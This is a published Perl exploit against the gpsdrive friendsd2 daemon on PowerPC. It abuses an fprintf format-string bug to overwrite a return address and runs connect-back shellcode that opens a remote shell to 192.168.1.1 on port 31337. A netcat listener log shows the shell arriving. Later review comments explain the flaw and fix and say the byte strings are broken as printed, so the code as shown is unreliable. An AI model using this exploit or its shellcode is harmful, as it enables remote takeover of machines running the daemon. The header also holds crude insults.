
# Title : gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)
# Published : 2005-11-04
# Author : Kevin Finisterre


#!/usr/bin/perl -w
# 
# Heh - Code by KF (kf_lists[at]digital_munition[dot]com)
#     - Shellcode by Charles Stevenson
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. 
# Free 14 day Testicle licking trial available! 
#
#                           IIIIIIIIII
#                           I::::::::I
#                           I::::::::I
#                           II::::::II
#                             I::::I
#                             I::::I ##     ##  #######  ########  ##    ##
#                             I::::I ##     ## ##     ## ##     ##   ####
# EEEEEEEEEEEEEEEEEEEEEE      I::::I ##     ## ##     ## ########     ##
# E::::::::::::::::::::E      I::::I  ##   ##  ##     ## ##   ##      ##
# E::::::::::::::::::::E      I::::I   ## ##   ##     ## ##    ##     ##
# EE::::::EEEEEEEEE::::E      I::::I    ###     #######  ##     ##    ##
#   E:::::E       EEEEEE      I::::I
#   E:::::E                 II::::::II
#   E::::::EEEEEEEEEE       I::::::::I
#   E:::::::::::::::E  and  I::::::::I
#   E:::::::::::::::E       IIIIIIIIII
#   E::::::EEEEEEEEEE    ########   #######  ##    ## ##    ##
#   E:::::E              ##     ## ##     ## ###   ##  ##  ##
#   E:::::E       EEEEEE ##     ## ##     ## ####  ##   ####
# EE::::::EEEEEEEE:::::E ########  ##     ## ## ## ##    ##
# E::::::::::::::::::::E ##     ## ##     ## ##  ####    ##
# E::::::::::::::::::::E ##     ## ##     ## ##   ###    ##
# EEEEEEEEEEEEEEEEEEEEEE ########   #######  ##    ##    ##
# (Kickin you all up in your grill piece since the early 90's)
#                                                      
# friendsd.c:367:   fprintf (stderr, txt);
#
# Tested against: gpsdrive_2.09-2_powerpc.deb
#
# Crash the program and go to frame 2
# 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
# (gdb) bt
# #0  0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
# #1  0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6
# #2  0x0f6825d0 in fprintf () from /lib/tls/libc.so.6
# #3  0x100024b8 in dg_echo ()
# #4  0x10002f28 in main ()
#
# Grab the address of Arglist for frame 2 and overwrite that +4
# (gdb) i f
# Stack level 2, frame at 0x7fffad70:
# pc = 0xf6825d0 in fprintf; saved pc 0x100024b8
# called by frame at 0x7fffae00, caller of frame at 0x7fff8700
# Arglist at 0x7fffad70, args:
# Locals at 0x7fffad70, Previous frame's sp in r1
#
# (gdb) x/a 0x7fffad70+4
# 0x7fffad74:     0xf6825d0 <fprintf+112>  (overwrite this)
#
# animosity:/home/kfinisterre# nc -l -p 31337 -vvv
# listening on [any] 31337 ...
# 192.168.1.1: inverse host lookup failed: Unknown host
# connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) 
# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)
# uname -a;
# Linux animosity 2.6.11-powerpc #1 Fri May 13 15:47:19 CEST 2005 ppc GNU/Linux
#
# This is NOT reliable or robust... Find your own damn pointers to overwrite

use Net::Friends;
use Data::Dumper;

# Root cause being exercised (see friendsd.c:367 above): the daemon hands a
# client-supplied buffer to fprintf() as the *format* argument instead of as
# data.  The one-line fix on the server side is fprintf(stderr, "%s", txt);
# gcc's -Wformat-security warns on exactly this pattern.
#
# NOTE(review): this script never enables `use strict`, so every variable
# below is a package global; under -w only undefined-value warnings fire.
#
# NOTE(review): as printed on this page the byte-string literals carry no `\`
# before each `x`, so Perl sees plain ASCII text ("x69x69...") rather than the
# PPC instruction bytes the trailing /* ... */ comments describe.  This looks
# like an extraction artefact of the page, not the author's intent.
$shellcode  =
"x69x69x69x69"  .  
# /* connect-core5.c by Charles Stevenson <core@bokeoa.com> */
"x7cx3fx0bx78" . #/*mr    r31,r1*/
"x3bx40x01x0e" . #/*li    r26,270*/
"x3bx5axfexf4" . #/*addi  r26,r26,-268*/
"x7fx43xd3x78" . #/*mr    r3,r26*/
"x3bx60x01x0d" . #/*li    r27,269*/
"x3bx7bxfexf4" . #/*addi  r27,r27,-268*/
"x7fx64xdbx78" . #/*mr    r4,r27*/
"x7cxa5x2ax78" . #/*xor   r5,r5,r5*/
"x7cx3cx0bx78" . #/*mr    r28,r1*/
"x3bx9cx01x0c" . #/*addi  r28,r28,268*/
"x90x7cxffx08" . #/*stw   r3,-248(r28)*/
"x90x9cxffx0c" . #/*stw   r4,-244(r28)*/
"x90xbcxffx10" . #/*stw   r5,-240(r28)*/
"x7fx63xdbx78" . #/*mr    r3,r27*/
"x3bxdfx01x0c" . #/*addi  r30,r31,268*/
"x38x9exffx08" . #/*addi  r4,r30,-248*/
"x3bx20x01x98" . #/*li    r25,408*/
"x7fx20x16x70" . #/*srawi r0,r25,2*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"x7cx78x1bx78" . #/*mr    r24,r3*/
"xb3x5exffx16" . #/*sth   r26,-234(r30)*/
"x7fxbdxeax78" . #/*xor   r29,r29,r29*/
#// Craft your exploit to poke these value in. Right now it's set
#// for port 31337 and ip 192.168.1.1. Here's an example
#// core@morpheus:~$ printf "0x%02x%02xn0x%02x%02xn" 192 168 1 1
#// 0xc0a8
#// 0x0101
# The four short literals below are the only operator-specific values in the
# payload: a callback port and an IPv4 address.  From a defender's side this
# is the outbound TCP connection to watch for when the daemon is compromised.
"x63xbd" .  # /* PORT # */ 
"x7ax69" .  #/*ori   r29,r29,31337*/
"xb3xbexffx18" . #/*sth   r29,-232(r30)*/
"x3fxa0" . # /*IP(A.B) */ 
#"x42x07" . # wtf is this?
"xc0xa8" . # /*lis   r29,-16216*/
"x63xbd" . # /*IP(C.D) */ 
#"xa1x39" . #  wtf is this? 
"x01x01" . # /*ori   r29,r29,257*/
"x93xbexffx1a" . #/*stw   r29,-230(r30)*/
"x93x1cxffx08" . #/*stw   r24,-248(r28)*/
"x3axdexffx16" . #/*addi  r22,r30,-234*/
"x92xdcxffx0c" . #/*stw   r22,-244(r28)*/
"x3bxa0x01x1c" . #/*li    r29,284*/
"x38xbdxfexf4" . #/*addi  r5,r29,-268*/
"x90xbcxffx10" . #/*stw   r5,-240(r28)*/
"x7fx20x16x70" . #/*srawi r0,r25,2*/
"x7cx7axdax14" . #/*add   r3,r26,r27*/
"x38x9cxffx08" . #/*addi  r4,r28,-248*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"x7fx03xc3x78" . #/*mr    r3,r24*/
"x7cx84x22x78" . #/*xor   r4,r4,r4*/
"x3axe0x01xf8" . #/*li    r23,504*/
"x7exe0x1ex70" . #/*srawi r0,r23,3*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"x7fx03xc3x78" . #/*mr    r3,r24*/
"x7fx64xdbx78" . #/*mr    r4,r27*/
"x7exe0x1ex70" . #/*srawi r0,r23,3*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
#// comment out the next 4 lines to save 16 bytes and lose stderr
#//"x7fx03xc3x78"    /*mr    r3,r24*/
#//"x7fx44xd3x78"    /*mr    r4,r26*/
#//"x7exe0x1ex70"    /*srawi r0,r23,3*/
#//"x44xdexadxf2"    /*.long0x44deadf2*/
"x7cxa5x2ax79" . #/*xor.  r5,r5,r5*/
"x42x40xffx35" . #/*bdzl+ 10000454<main>*/
"x7fx08x02xa6" . #/*mflr  r24*/
"x3bx18x01x34" . #/*addi  r24,r24,308*/
"x98xb8xfexfb" . #/*stb   r5,-261(r24)*/	/* KF / Core / Ghandi mojo */
"x38x78xfexf4" . #/*addi  r3,r24,-268*/
"x90x61xffxf8" . #/*stw   r3,-8(r1)*/
"x38x81xffxf8" . #/*addi  r4,r1,-8*/
"x90xa1xffxfc" . #/*stw   r5,-4(r1)*/
"x3bxc0x01x60" . #/*li    r30,352*/
"x7fxc0x2ex70" . #/*srawi r0,r30,5*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"/bin/shZ";     # /* Z will become NULL */

# Value sent in the report's `name` field.  Its role is not stated anywhere
# here; presumably padding that shapes the daemon's stack layout — confirm
# against the friendsd source before relying on it.
$name = 'aaaaaaaa-aaaa';  
 
# Two assignments in a row: the first (gdb) value is dead code, the second
# wins.  Both are absolute stack addresses for one specific binary, kernel
# and environment, which is why the author calls this unreliable; any stack
# randomisation or environment-size change invalidates them.
$writeaddr = 0x7fffad74; # Saved ret in frame 2 Arglist+4 (inside gdb)
$writeaddr = 0x7fffad94; # (outside gdb) Pladow! Kickin fools all up in the grill piece. 

# pack 'l' is a native-endian signed 32-bit integer of the *host running this
# script*, not a fixed byte order; the ppc target is big-endian.  The second
# address is the first plus 2, i.e. the two halves of one 32-bit slot.
$addy  = pack('l', $writeaddr);
$addy2 = pack('l', $writeaddr+2);

# Where the payload is expected to sit in the daemon's stack; same caveats as
# $writeaddr.  The gdb value is kept only as a comment.
#$instr = 0x7fffae84;  # Shellcode (inside gdb)
$instr = 0x7fffaea4;  # Shellcode (outside gdb)

# Split the target value into its upper and lower 16-bit halves.
$lo = ($instr >> 0) & 0xffff;
$hi = ($instr >> 16) & 0xffff;
		
# The 0x4e and 0x50 adjustments presumably compensate for characters already
# emitted before each %n-style write (the two packed addresses and the `|`
# separators), and the 0x10000 keeps $lo positive after subtracting $hi.
# NOTE(review): neither constant is derivable from anything on this page —
# confirm against the daemon's actual output length.
$hi = $hi - 0x4e;
$lo = (0x10000 + $lo) - $hi - 0x50;		

#$hi = 1; $lo =1;

# The `dir` field is what reaches fprintf() as a format string.  It carries
# the two packed addresses, two width-padded %d conversions and two `%N$hn`
# positional short writes, followed by the payload bytes.
# NOTE(review): inside a Perl double-quoted string an unescaped `$hn` is
# interpolated as the (undefined) Perl variable $hn, so as printed here the
# string does not contain the literal text "$hn" — consistent with the
# missing-backslash artefact noted at the top of this block.
$dir = "$addy$addy2|%." . $hi . "d|%28$hn|%." . $lo . "d|%29$hn$shellcode";

# Target host comes from the first command-line argument, defaulting to
# localhost.  Net::Friends is a project module, not core Perl.
$friends = Net::Friends->new(shift || 'localhost');
# A single ordinary-looking position report with the crafted `dir` field;
# lat/lon/speed are filler.  The server's reply is dumped only so the caller
# can see whether the daemon is still answering.
$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir);
print Dumper($friends->query);

# P.S. Fsck drow! And did I mention k-otick blows! Gimme some freedom fries you bastards! 
